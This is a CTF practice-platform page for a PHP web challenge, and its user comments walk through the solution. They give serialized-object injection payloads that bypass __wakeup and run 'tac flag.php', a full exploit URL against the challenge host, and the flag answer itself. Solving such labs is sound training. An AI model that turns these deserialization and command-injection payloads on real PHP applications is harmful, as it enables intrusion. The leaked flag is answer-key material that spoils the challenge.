安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 1899
提  示:
描  述:
flag{}
评论
LLTVLL 3月前

AI分析PHP序列化程序得出结果,注意补空格和占位符,降低学习PHP语言的成本,提升准确率。。。。

回复 0

Bojing 8月前

有哪里提示了username是admin的吗

回复 0
numberone 6月前

源代码里不是有个if语句:if ($this->username === 'admin')

回复 0

18956160518 9月前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 1

EtHat 1年前

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

xht0525 1年前

nl flag.php|base64

回复 0

不会编程的崽 1年前

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

回复 0

不会编程的崽 1年前

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

c41vin 1年前

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

回复 0

wxy1343 1年前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

wxy1343 1年前

flag{Unser1alize_and_2CE_Add}

回复 0

WriteUp

image
小赵同学

3 金币

评分(3)

解题动态

YameMres 攻破了该题 45分钟前
zttyzz 攻破了该题 3天前
zwhnsh 攻破了该题 4天前
20220406402021 攻破了该题 4天前
fujialong 攻破了该题 4天前
17666664717 攻破了该题 4天前
sudden 攻破了该题 5天前
mmmiao 攻破了该题 6天前
19868806758 攻破了该题 6天前
18185185996 攻破了该题 8天前
lihaojie123 攻破了该题 9天前
x1997 攻破了该题 9天前
17330361658 攻破了该题 10天前
积极又努力的小冀同学 攻破了该题 10天前
675838709 攻破了该题 10天前
ifnoif 攻破了该题 10天前
fyhfyh 攻破了该题 11天前
folinic 攻破了该题 11天前
654272406 攻破了该题 11天前
2175424922 攻破了该题 11天前
问题反馈